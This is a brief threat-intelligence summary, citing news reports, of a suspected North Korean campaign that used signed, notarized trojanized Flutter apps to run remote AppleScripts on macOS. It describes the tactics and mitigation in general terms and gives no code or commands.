Introduction
Recent reports indicate that suspected North Korean threat actors are targeting Apple macOS systems. They are employing trojanized applications to bypass security protocols and execute malicious activities, primarily focusing on financial theft through cryptocurrency themes.
Description
Suspected North Korean threat actors are targeting Apple macOS systems by deploying trojanized Notepad applications and an open-source Minesweeper game developed with Flutter [3], a software development kit from Google [1]. These applications are signed and notarized using a legitimate Apple developer ID [3], allowing them to temporarily bypass Apple’s security protocols [3]. Consequently [3], macOS systems recognize these malicious applications as verified and permit their execution without restrictions [3].
The malware embedded within these applications utilizes sophisticated code to connect to a suspicious domain, downloading and executing malicious AppleScripts that enable remote control of the victim’s computer [2]. A significant feature of this malware is its capability to execute remote AppleScript commands [2], facilitating actions such as data capture and further malware installation [2].
The use of Flutter allows for a unique app layout that obscures the underlying code [1], as the main app logic [1], written in Dart [1], is contained within a dynamic library (dylib) loaded by the Flutter engine [1]. The applications primarily focus on cryptocurrency themes [3], indicating the hackers’ interest in financial theft [3]. Notably, the malicious scripts are designed to evade detection by employing techniques such as writing code backward.
Findings from Jamf Threat Labs suggest that this campaign appears to be more of an experimental effort to circumvent macOS security rather than a highly targeted operation [3], with researchers believing that the malware is still in its testing phase [1].
Conclusion
The implications of this campaign are significant, as it highlights vulnerabilities in macOS security protocols that can be exploited by threat actors. Mitigation strategies should focus on enhancing security measures to detect and prevent such trojanized applications from executing. As the malware is believed to be in its testing phase, it is crucial for security researchers and organizations to remain vigilant and proactive in addressing potential threats to prevent future attacks.
References
[1] https://thecyberwire.com/newsletters/daily-briefing/13/214
[2] https://appleinsider.com/articles/24/11/12/north-korean-hackers-use-infected-crypto-apps-to-target-mac-devices
[3] https://www.isss.org.uk/news/north-korean-hackers-create-flutter-apps-to-bypass-macos-security/